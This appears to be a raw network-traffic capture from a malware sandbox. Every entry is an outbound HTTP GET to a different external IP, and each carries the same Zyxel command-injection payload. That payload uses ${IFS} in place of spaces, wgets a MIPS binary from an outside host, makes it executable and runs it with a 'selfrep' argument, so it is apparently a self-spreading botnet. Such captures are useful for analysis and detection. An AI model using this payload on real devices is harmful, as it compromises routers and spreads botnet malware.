                                          Jan 14, 2024 15:46:30.312689066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7809192.168.2.233945417.196.40.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312716007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7810192.168.2.2341714133.253.97.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312740088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7811192.168.2.2352592169.76.120.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312756062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7812192.168.2.2358928220.170.239.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312793016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7813192.168.2.235246463.181.241.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312815905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7814192.168.2.234754843.213.105.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312840939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7815192.168.2.2351818197.179.210.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312871933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7816192.168.2.2340444205.148.29.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312896967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7817192.168.2.2356426203.218.128.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312927961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7818192.168.2.2342690152.151.228.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312937975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7819192.168.2.234761692.152.67.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312964916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7820192.168.2.234849066.170.33.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.312988997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7821192.168.2.234329075.109.223.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313018084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7822192.168.2.235470279.237.43.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313061953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7823192.168.2.2337224126.187.237.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313087940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7824192.168.2.23411502.42.99.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313112974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7825192.168.2.2337384145.210.63.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313146114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7826192.168.2.2353838114.226.88.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313157082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7827192.168.2.2353674205.78.253.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313179016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7828192.168.2.2338348198.56.93.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313185930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7829192.168.2.233971889.14.13.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313213110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7830192.168.2.2341470129.109.24.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313230991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7831192.168.2.234146499.77.249.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313240051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7832192.168.2.235618086.233.169.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313317060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7833192.168.2.2350408206.245.149.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313339949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7834192.168.2.2358822173.210.166.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313366890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7835192.168.2.2343428192.182.2.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313405991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7836192.168.2.234891880.188.143.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313438892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7837192.168.2.234437099.121.122.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313452005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7838192.168.2.234000477.119.14.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313472986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7839192.168.2.2340424169.17.33.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313509941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7840192.168.2.235773219.254.108.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313555956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7841192.168.2.2350146198.72.179.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313585997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7842192.168.2.234110697.229.175.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313623905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7843192.168.2.2350530104.40.62.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313662052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7844192.168.2.2358422220.19.156.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313678980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7845192.168.2.2356474205.72.82.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313704967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7846192.168.2.2341312153.186.238.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313730001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7847192.168.2.234971012.83.29.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313766003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7848192.168.2.2338778164.195.75.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313785076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7849192.168.2.2360714156.233.188.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313811064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7850192.168.2.2335776128.115.185.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313831091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7851192.168.2.2333374173.121.73.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313848972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7852192.168.2.2352862121.127.85.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313867092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7853192.168.2.235733873.20.76.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313884020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7854192.168.2.235460691.56.48.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313935995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7855192.168.2.236015077.177.226.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313946962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7856192.168.2.2352724106.57.92.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313982964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7857192.168.2.2337792149.77.177.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.313994884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7858192.168.2.2359426109.36.21.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314024925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7859192.168.2.234548227.13.107.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314024925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7860192.168.2.235871682.145.118.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314080954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7861192.168.2.2352644155.202.172.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314106941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7862192.168.2.235433093.17.232.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314106941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7863192.168.2.2350286180.148.26.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314146996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7864192.168.2.2336710189.5.172.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314182043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7865192.168.2.2355254119.194.51.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314188004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7866192.168.2.2353286109.103.170.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314210892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7867192.168.2.2341614213.97.132.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314239979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7868192.168.2.2344400179.203.37.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314263105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7869192.168.2.2348644156.34.153.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314294100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7870192.168.2.2332958210.129.255.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.314316034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7871192.168.2.2355404211.109.193.221443
                                          TimestampBytes transferredDirectionData
